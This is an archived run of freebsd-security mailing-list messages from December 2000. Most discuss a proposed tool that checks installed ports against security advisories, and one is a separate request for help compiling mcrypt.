Finger evilfry@sg.freebsd.org for PGP key.

----- Original Message -----
From: "Jeff Gentry" To: "Mikhail Kruk" Cc: "Anil Jangity" ; "jrz" ; Sent: Saturday, December 16, 2000 9:59 AM Subject: Re: Security Update Tool.. > On Fri, 15 Dec 2000, Mikhail Kruk wrote: > > I'm not sure that many people would like that kind of automation, but what > > is really missing IMHO is ability to mark ports whichs are insecure and > > add some option to pkg_info which will check all installed packages. I > > think OpenBSD has exacty this, no? > > I don't think it has to be automated *and* "behind the covers" ... > I think a 2 stage process would be good -> first stage figures out what > (if any) you need, and if possible, explains why. The 2nd stage would > allow you to apply changes if you wanted to or not. > > -- > Jeff Gentry jester@hexdump.org gentrj@hexdump.org > SEX DRUGS UNIX > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 18:28:52 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:28:51 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2F04637B400 for ; Fri, 15 Dec 2000 18:28:47 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (1087 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 15 Dec 2000 20:27:11 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Fri, 15 Dec 2000 20:27:10 -0600 (CST) 
From: James Wyatt
To: Chris Faulhaber
Cc: Mikhail Kruk , James Lim , security@FreeBSD.ORG
Subject: Re: Security Update Tool..
In-Reply-To: <20001215201018.A90289@peitho.fxp.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 15 Dec 2000, Chris Faulhaber wrote:

> On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote:
> > um... marking port forbidden will prevent you from installing it, but is
> > there ability to audit ports you have already installed?
> >
>
> Not exactly, though pkg_version(1) will tell you what packages
> require updating.

When did this command appear? I don't have it here yet. - Jy@

From owner-freebsd-security Fri Dec 15 18:34:36 2000
From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:34:35 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id CABC737B402 for ; Fri, 15 Dec 2000 18:34:34 -0800 (PST)
Received: by peitho.fxp.org (Postfix, from userid 1000) id 1C7091360E; Fri, 15 Dec 2000 21:34:34 -0500 (EST)
Date: Fri, 15 Dec 2000 21:34:34 -0500
From: Chris Faulhaber
To: James Wyatt
Cc: security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Message-ID: <20001215213433.A98440@peitho.fxp.org>
References: <20001215201018.A90289@peitho.fxp.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from jwyatt@rwsystems.net on Fri, Dec 15, 2000 at 08:27:10PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Dec 15, 2000 at 08:27:10PM -0600, James Wyatt wrote:

> On Fri, 15 Dec 2000, Chris Faulhaber wrote:
> > On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote:
> > > um... marking port forbidden will prevent you from installing it, but is
> > > there ability to audit ports you have already installed?
> > >
> >
> > Not exactly, though pkg_version(1) will tell you what packages
> > require updating.
>
> When did this command appear? I don't have it here yet. - Jy@
>

Added to the tree on:
Fri Nov 26 20:31:58 1999 UTC (12 months, 2 weeks ago) by billf

See:
http://www.FreeBSD.org/cgi/cvsweb.cgi/src/usr.sbin/pkg_install/version/pkg_version.pl
for details on your branch.

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Fri Dec 15 18:43:19 2000
From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:43:16 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f25.law7.hotmail.com [216.33.237.25]) by hub.freebsd.org (Postfix) with ESMTP id 056D337B402 for ; Fri, 15 Dec 2000 18:43:16 -0800 (PST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 15 Dec 2000 18:43:15 -0800
Received: from 209.53.54.44 by lw7fd.law7.hotmail.msn.com with HTTP; Sat, 16 Dec 2000 02:43:15 GMT
X-Originating-IP: [209.53.54.44]
From: "Some Person"
To: jameslpin@pacific.net.sg, freebsd@hexdump.org, meshko@cs.brandeis.edu
Cc: aj@entic.net, jrz@cnmnetwork.com, security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Date: Sat, 16 Dec 2000 02:43:15
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID:
X-OriginalArrivalTime: 16 Dec 2000 02:43:15.0843 (UTC) FILETIME=[F0C8C530:01C06709]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

So my idea wasn't so bad after all? :)

I figure at least it might give some ideas to those who know more than what I can do, and maybe enlighten some more ideas rooting from this.

>
>Hi all,
> Seems like today we have 2 ideas, ports autoupdate utility (
>security checks too ) as well as for the src base itself?
>
>
>James Lim
>Technical Support Executive
>
>Pacific Internet Limited
>89 Science Park Drive
>#02-05/06 The Rutherford
>Singapore 118261
>
>Finger evilfry@sg.freebsd.org for PGP key.
>
>----- Original Message -----
>From: "Jeff Gentry"
>To: "Mikhail Kruk"
>Cc: "Anil Jangity" ; "jrz" ;
>
>Sent: Saturday, December 16, 2000 9:59 AM
>Subject: Re: Security Update Tool..
>
>
> > On Fri, 15 Dec 2000, Mikhail Kruk wrote:
> > > I'm not sure that many people would like that kind of automation, but what
> > > is really missing IMHO is ability to mark ports which are insecure and
> > > add some option to pkg_info which will check all installed packages. I
> > > think OpenBSD has exactly this, no?
> >
> > I don't think it has to be automated *and* "behind the covers" ...
> > I think a 2 stage process would be good -> first stage figures out what
> > (if any) you need, and if possible, explains why. The 2nd stage would
> > allow you to apply changes if you wanted to or not.
> >
> > --
> > Jeff Gentry jester@hexdump.org gentrj@hexdump.org
> > SEX DRUGS UNIX

From owner-freebsd-security Fri Dec 15 18:50:56 2000
From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:50:55 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from puck.firepipe.net (poynting.physics.purdue.edu [128.210.146.58]) by hub.freebsd.org (Postfix) with ESMTP id DA75137B402 for ; Fri, 15 Dec 2000 18:50:54 -0800 (PST)
Received: by puck.firepipe.net (Postfix, from userid 1000) id 25CE718D4; Fri, 15 Dec 2000 21:50:54 -0500 (EST)
Date: Fri, 15 Dec 2000 21:50:54 -0500
From: Will Andrews
To: Some Person
Cc: jameslpin@pacific.net.sg, freebsd@hexdump.org, meshko@cs.brandeis.edu, aj@entic.net, jrz@cnmnetwork.com, security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Message-ID: <20001215215054.I21327@puck.firepipe.net>
Reply-To: Will Andrews
Mail-Followup-To: Will Andrews , Some Person , jameslpin@pacific.net.sg, freebsd@hexdump.org, meshko@cs.brandeis.edu, aj@entic.net, jrz@cnmnetwork.com, security@FreeBSD.ORG
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 02:43:15AM +0000
X-Operating-System: FreeBSD 4.2-STABLE i386
Sender: will@puck.firepipe.net
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Dec 16, 2000 at 02:43:15AM +0000, Some Person wrote:

> So my idea wasn't so bad after all? :)
>
> I figure at least it might give some ideas to those who know more than what I
> can do, and maybe enlighten some more ideas rooting from this.

No, it wasn't a bad idea.. however, it's also not new. :-)

Kris Kennaway asked someone to port the neato script NetBSD has in their pkgsrc for security-related updates and such, and that was a couple months ago. Maybe I'll get around to doing that, but I think I already stacked enough stuff on my todo list.

--
wca

From owner-freebsd-security Fri Dec 15 20: 8:42 2000
From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 20:08:40 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id C95E337B400 for ; Fri, 15 Dec 2000 20:08:39 -0800 (PST)
Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id UAA10128; Fri, 15 Dec 2000 20:09:57 -0800
Date: Fri, 15 Dec 2000 20:09:57 -0800
From: Kris Kennaway
To: Some Person
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Message-ID: <20001215200957.A10030@citusc.usc.edu>
References:
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Dxnq1zWXvFF0Q93v"
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 12:16:29AM +0000
Sender: kris@citusc.usc.edu
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote:

> My question is, is there a util yet that in theory (maybe if so, or if
> someone writes one would work differently than what I'm imagining) queries a
> central database with all the security advisories, checks the local system
> for comparisons and vulnerabilities against that database and reports to the
> user who ran the util.

Not at present - I was talking to someone a few months ago about doing exactly this: the existing security advisories we publish contain all of the information you need to implement such a thing (at least for ports), although we'd probably need to structure them more rigidly so they can be machine-parsed. However nothing concrete has materialised yet, so there's still plenty of room for interested contributors to step up and help :-)

Note that identification of vulnerabilities is different from automated correction of vulnerabilities - in order to do that it needs some fairly complicated infrastructure in the ports system to upgrade ports/packages and handle dependencies etc. Not that I want to dissuade anyone from working on this very worthy project :-)

Kris

From owner-freebsd-security Sat Dec 16 7:23:33 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 07:23:29 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 64D3337B400; Sat, 16 Dec 2000 07:23:27 -0800 (PST)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 147JBE-00009e-00; Sat, 16 Dec 2000 17:23:24 +0200
Date: Sat, 16 Dec 2000 17:23:24 +0200 (IST)
From: Roman Shterenzon
To: Kris Kennaway
Cc: Some Person ,
Subject: Re: Security Update Tool..
In-Reply-To: <20001215200957.A10030@citusc.usc.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 15 Dec 2000, Kris Kennaway wrote:

> On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote:
>
> > My question is, is there a util yet that in theory (maybe if so, or if
> > someone writes one would work differently than what I'm imagining) queries a
> > central database with all the security advisories, checks the local system
> > for comparisons and vulnerabilities against that database and reports to the
> > user who ran the util.
>
> Not at present - I was talking to someone a few months ago about doing
> exactly this: the existing security advisories we publish contain all
> of the information you need to implement such a thing (at least for
> ports), although we'd probably need to structure them more rigidly so
> they can be machine-parsed. However nothing concrete has materialised
> yet, so there's still plenty of room for interested contributors to
> step up and help :-)
>
> Note that identification of vulnerabilities is different from
> automated correction of vulnerabilities - in order to do that it needs
> some fairly complicated infrastructure in the ports system to upgrade
> ports/packages and handle dependencies etc. Not that I want to
> dissuade anyone from working on this very worthy project :-)
>
> Kris

I'm the person Kris was talking about. I'm working on it, have little
time, and switched to gnupg lately, but it'll be done eventually.
Perhaps this thread will make me finish it earlier.
I'd like to hear ideas which I will incorporate in it.
Meanwhile the main idea is:
1) have a local directory for advisories
2) upon start, contact freebsd.org and check for newer advisories
3) check advisories with gnupg (security officer's pgp key has to be
installed manually).
4) extract the valuable information from the advisory
5) check against /var/db/pkg/* (revisions, and before it was invented -
dates, yes, I know it's weak, but I've nothing to with it).
6) depending on running mode, complain or upgrade (pkg_delete; pkg_install
-r)
7) anything else?
Written in perl and will be called pkg_security.
I guess it could be changed to sacheck if all binaries have the id in
them, so using what(1) will reveal the cvs revision.

Looking forward to your comments,

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Sat Dec 16 7:27:12 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 07:27:10 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 3A6CE37B400 for ; Sat, 16 Dec 2000 07:27:09 -0800 (PST)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 147JES-00009v-00; Sat, 16 Dec 2000 17:26:44 +0200
Date: Sat, 16 Dec 2000 17:26:44 +0200 (IST)
From: Roman Shterenzon
To: Chris Faulhaber
Cc: Mikhail Kruk , James Lim ,
Subject: Re: Security Update Tool..
In-Reply-To: <20001215201018.A90289@peitho.fxp.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 15 Dec 2000, Chris Faulhaber wrote:

> On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote:
> > um... marking port forbidden will prevent you from installing it, but is
> > there ability to audit ports you have already installed?
> >
>
> Not exactly, though pkg_version(1) will tell you what packages
> require updating.

pkg_version works with /usr/ports/INDEX which tends to be outdated. One has to do make index in /usr/ports (and have the full ports collection) for it to work as expected, and, of course, ports-all has to be up-to-date. I was thinking more about check vs. advisories.

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Sat Dec 16 7:28:25 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 07:28:23 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 8186A37B402 for ; Sat, 16 Dec 2000 07:28:22 -0800 (PST)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 147JFx-0000A2-00; Sat, 16 Dec 2000 17:28:17 +0200
Date: Sat, 16 Dec 2000 17:28:17 +0200 (IST)
From: Roman Shterenzon
To: James Lim
Cc:
Subject: Re: Security Update Tool..
In-Reply-To: <00a701c06704$9ae4f440$fa5e78cb@gchang>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 16 Dec 2000, James Lim wrote:

> Hi all,
> Seems like today we have 2 ideas, ports autoupdate utility (
> security checks too ) as well as for the src base itself?

ports auto-update is BAD, BAD, BAD.
1) don't fix what's not broken
2) newer versions tend to be more bloated and more prone to bugs.

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Sat Dec 16 9:44:10 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 09:44:08 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 523C937B402 for ; Sat, 16 Dec 2000 09:44:07 -0800 (PST)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA89235; Sat, 16 Dec 2000 18:43:56 +0100 (CET) (envelope-from des@ofug.org)
Sender: des@ofug.org
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Roman Shterenzon
Cc: Chris Faulhaber , Mikhail Kruk , James Lim ,
Subject: Re: Security Update Tool..
References:
From: Dag-Erling Smorgrav
Date: 16 Dec 2000 18:43:55 +0100
In-Reply-To: Roman Shterenzon's message of "Sat, 16 Dec 2000 17:26:44 +0200 (IST)"
Message-ID:
Lines: 18
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Roman Shterenzon writes:
> pkg_version works with /usr/ports/INDEX which tends to be outdated.

Porteasy (ports/misc/porteasy) already knows how to:

1) update ports/INDEX
2) make do without it if it already knows the "true" name of the port
3) update individual ports and their dependencies recursively
3) obtain the full name and version of ports from their Makefiles

and already has an option for listing installed ports (and marking those that don't match anything in INDEX). It could quite trivially be updated to perform pkg_version's duties as well, without relying on an out-of-date INDEX.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sat Dec 16 11:50:55 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 11:50:53 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id F391B37B400 for ; Sat, 16 Dec 2000 11:50:52 -0800 (PST)
Received: from bsdie.rwsystems.net([209.197.223.2]) (2278 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 16 Dec 2000 13:50:48 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Sat, 16 Dec 2000 13:50:46 -0600 (CST)
From: James Wyatt
To: Roman Shterenzon
Cc: James Lim , security@FreeBSD.ORG
Subject: Re: Security Update Tool..
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 16 Dec 2000, Roman Shterenzon wrote:

> On Sat, 16 Dec 2000, James Lim wrote:
> > Seems like today we have 2 ideas, ports autoupdate utility (
> > security checks too ) as well as for the src base itself?
> ports auto-update is BAD, BAD, BAD.
> 1) don't fix what's not broken
> 2) newer versions tend to be more bloated and more prone to bugs.

1) This is to fix what *is* broken, isn't it?

2) sometimes - depends on what the update does and who's developing. Many of the wuftpd updates make it better even if checking for bounds causes code bloat. (^_^) Major reconstructs commonly have more bugs than fixes, but I've seen quite a few simple updates that fix something that needed to be fixed ASAP. A smoke alarm for these could be great!

Several folks have pointed-out that automagic updates would be "bad", but something that just let you know when you should look at upgrading something would be great. Some folks see how cool Windows update works, some folks see it could be deadly - it's both and we could do better. The thing I like least about it is that I can't keep a copy of the update files so I can fix several hosts or rebuild broken ones w/o going through the whole site again.

I don't like automagic rebuilds of ports because several of my ports have twists in them for local alterations. For example, I needed to modify both smail and cucipop for adding whosond support to prevent relaying but allow my users to roam freely. Auto remakes would likely die on patching or screw things up more than I could quickly notice, figure out, and fix.

Of course, like many, I have more ideas than patches... - Jy@

From owner-freebsd-security Sat Dec 16 12:47: 4 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 12:47:02 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 1762337B400 for ; Sat, 16 Dec 2000 12:47:01 -0800 (PST)
Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 147OIH-0000Tz-00; Sat, 16 Dec 2000 13:51:01 -0700
Sender: wes@FreeBSD.ORG
Message-ID: <3A3BD5B4.B1B10FEE@softweyr.com>
Date: Sat, 16 Dec 2000 13:51:00 -0700
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Mikhail Kruk
Cc: Anil Jangity , jrz , security@FreeBSD.ORG
Subject: Re: Security Update Tool..
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mikhail Kruk wrote:
>
> I'm not sure that many people would like that kind of automation, but what
> is really missing IMHO is ability to mark ports which are insecure and
> add some option to pkg_info which will check all installed packages. I
> think OpenBSD has exactly this, no?
>
> > I think he was looking for something a little more "automated". Something
> > like IE's "Window's update" for freebsd ;-)
> >
> > I don't think it's too difficult to do this, all you do is do ident on any
> > binaries that are on the local system and compare the version with the
> > version string in the advisories... the advisory might need some
> > formatting changes?

The way to keep the operating system up to date is with CVSup and make world. A tool to scan all the installed ports and compare against the current ports tree, plus security advisories for ports, would be nice.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Sat Dec 16 15:15:55 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 15:15:52 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from mail.pinboard.com (mail.pinboard.com [194.209.195.7]) by hub.freebsd.org (Postfix) with ESMTP id BAF5B37B400 for ; Sat, 16 Dec 2000 15:15:51 -0800 (PST)
Received: (from uucp@localhost) by mail.pinboard.com (8.9.3/8.9.3/20000102-00-KK) with UUCP id AAA09175 for freebsd-security@FreeBSD.org; Sun, 17 Dec 2000 00:15:50 +0100 (CET) (envelope-from kurt@pinboard.com (kurt@pinboard.com)) (client-IP )
Received: (from uucp@localhost) by squirrel.pbdhome.pinboard.com (8.9.1/8.9.1-19980817-01/KK) with UUCP id XAA11682 for freebsd-security@FreeBSD.org; Sat, 16 Dec 2000 23:51:49 +0100 (CET) (envelope-from: kurt@pinboard.com)
Received: (from kurt@localhost) by badger.pbdhome.pinboard.com (8.9.3/8.9.3/20000829-01-KK) id XAA53898; Sat, 16 Dec 2000 23:49:11 +0100 (CET) (envelope-from kurt (kurt)) (client-IP )
Date: Sat, 16 Dec 2000 23:49:10 +0100
From: Kurt@pinboard.com
To: freebsd-security@FreeBSD.org
Subject: mcrypt
Message-ID: <20001216234910.A14562@pinboard.com>
Mail-Followup-To: Kurt@pinboard.com, freebsd-security@FreeBSD.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This is probably more a C question than security, but the people here are most likely to have experience using and compiling this tool, so...

I'm administering some FreeBSD machines around the world. They do not all have the same release. The need arose to be able to move and store files between the machines in a safe manner: encrypted. bdes is not available on all machines and crypt is supposedly weak and also sometimes linked against MD5 and sometimes against DES.

So in order to get one tool I can use across all machines, I was looking at mcrypt (http://mcrypt.hellug.gr/). While compilation and installation of libmcrypt-2.4.7 and mhash-0.8.3 went without a problem, configure of mcrypt-2.5.5 is always complaining about not finding mhash. On Solaris it was enough to set the environment variable LD_LIBRARY_PATH to /usr/local/lib:/usr/local/lib/libmcrypt, on FreeBSD, this does not do the trick.

About libtool in the mhash* and libmcrypt* directories I can't find out how to use it.

I'd be grateful for hints on what I'm doing wrong.

Kurt

------- some addnl info -------
# ldconfig -r | grep mhash
97:-lmhash.2 => /usr/local/lib/libmhash.so.2
#
# tail -13 config.log
configure:3471: gcc -o conftest -g -O2 conftest.c -lmhash 1>&5
/usr/libexec/elf/ld: cannot open -lmhash: No such file or directory
configure: failed program was:
#line 3460 "configure"
#include "confdefs.h"
/* Override any gcc2 internal prototype to avoid an error. */
/* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
char mhash_keygen();

int main() {
mhash_keygen()
; return 0; }
#
# ls -l /usr/local/lib/*mha*
-rw-r--r-- 1 root wheel 261142 Dec 16 21:28 /usr/local/lib/libmhash.a
-rwxr-xr-x 1 root wheel 642 Dec 16 21:28 /usr/local/lib/libmhash.la
lrwxr-xr-x 1 root wheel 13 Dec 16 21:28 /usr/local/lib/libmhash.so -> libmhash.so.2
-rwxr-xr-x 1 root wheel 183296 Dec 16 21:28 /usr/local/lib/libmhash.so.2
------- end addnl info -------

From owner-freebsd-security Sat Dec 16 18:43:25 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 18:43:22 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f246.law7.hotmail.com [216.33.237.246]) by hub.freebsd.org (Postfix) with ESMTP id 0A95837B400; Sat, 16 Dec 2000 18:43:22 -0800 (PST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 16 Dec 2000 18:43:21 -0800
Received: from 209.53.54.44 by lw7fd.law7.hotmail.msn.com with HTTP; Sun, 17 Dec 2000 02:43:21 GMT
X-Originating-IP: [209.53.54.44]
From: "Some Person"
To: roman@xpert.com, kris@FreeBSD.ORG
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Date: Sun, 17 Dec 2000 02:43:21
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID:
X-OriginalArrivalTime: 17 Dec 2000 02:43:21.0694 (UTC) FILETIME=[1EAF4FE0:01C067D3]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Right on! That's excellent to hear.. sacheck, well, that was just a hypothetical name I gave it. ;)

So far, I can't think of much more than what you've mentioned, but I'm sure later on I will think of things especially once it's implemented and I can test it out... I'll be sure to keep your email addy handy.

>
>On Fri, 15 Dec 2000, Kris Kennaway wrote:
>
> > On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote:
> >
> > > My question is, is there a util yet that in theory (maybe if so, or if
> > > someone writes one would work differently than what I'm imagining) queries a
> > > central database with all the security advisories, checks the local system
> > > for comparisons and vulnerabilities against that database and reports to the
> > > user who ran the util.
> >
> > Not at present - I was talking to someone a few months ago about doing
> > exactly this: the existing security advisories we publish contain all
> > of the information you need to implement such a thing (at least for
> > ports), although we'd probably need to structure them more rigidly so
> > they can be machine-parsed. However nothing concrete has materialised
> > yet, so there's still plenty of room for interested contributors to
> > step up and help :-)
> >
> > Note that identification of vulnerabilities is different from
> > automated correction of vulnerabilities - in order to do that it needs
> > some fairly complicated infrastructure in the ports system to upgrade
> > ports/packages and handle dependencies etc. Not that I want to
> > dissuade anyone from working on this very worthy project :-)
> >
> > Kris
>
>I'm the person Kris was talking about. I'm working on it, have little
>time, and switched to gnupg lately, but it'll be done eventually.
>Perhaps this thread will make me finish it earlier.
>I'd like to hear ideas which I will incorporate in it.
>Meanwhile the main idea is:
>1) have a local directory for advisories
>2) upon start, contact freebsd.org and check for newer advisories
>3) check advisories with gnupg (security officer's pgp key has to be
>installed manually).
>4) extract the valuable information from the advisory
>5) check against /var/db/pkg/* (revisions, and before it was invented -
>dates, yes, I know it's weak, but I've nothing to with it).
>6) depending on running mode, complain or upgrade (pkg_delete; pkg_install
>-r)
>7) anything else?
>Written in perl and will be called pkg_security.
>I guess it could be changed to sacheck if all binaries have the id in
>them, so using what(1) will reveal the cvs revision.
>
>Looking forward to your comments,
>
>--Roman Shterenzon, UNIX System Administrator and Consultant
>[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]
>

From owner-freebsd-security Sat Dec 16 22:34:16 2000
From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 22:34:14 2000
Return-Path:
Delivered-To: freebsd-security@freebsd.org
Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id 44DFE37B400 for ; Sat, 16 Dec 2000 22:34:14 -0800 (PST)
Received: from localhost (marquis@localhost) by roble.com with ESMTP id eBH6Y9F12654 for ; Sat, 16 Dec 2000 22:34:09 -0800 (PST)
Date: Sat, 16 Dec 2000 22:34:07 -0800 (PST)
From: Roger Marquis
To: security@FreeBSD.ORG
Subject: Re: Security Update Tool..

> My question is, is there a util yet that in theory (maybe if so, or if
> someone writes one would work differently than what I'm imagining) queries a
> central database with all the security advisories, checks the local system
> for comparisons and vulnerabilities against that database and reports to the
> user who ran the util.

Before reinventing the wheel interested developers might check the
reference implementation, Sun's Patchdiag:

    http://sunsolve.Sun.COM/private-cgi/show.pl?target=resources/patchdiag

(NOTE: this URL does require a SunSolve account)

--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Sat Dec 16 23:23:10 2000
From: "Some Person"
To: marquis@roble.com, security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Date: Sun, 17 Dec 2000 07:23:08

Ummm, it prompts for a username/password.. ;)

>Before reinventing the wheel interested developers might check the
>reference implementation, Sun's Patchdiag:
>
> http://sunsolve.Sun.COM/private-cgi/show.pl?target=resources/patchdiag
>
>(NOTE: this URL does require a SunSolve account)
>
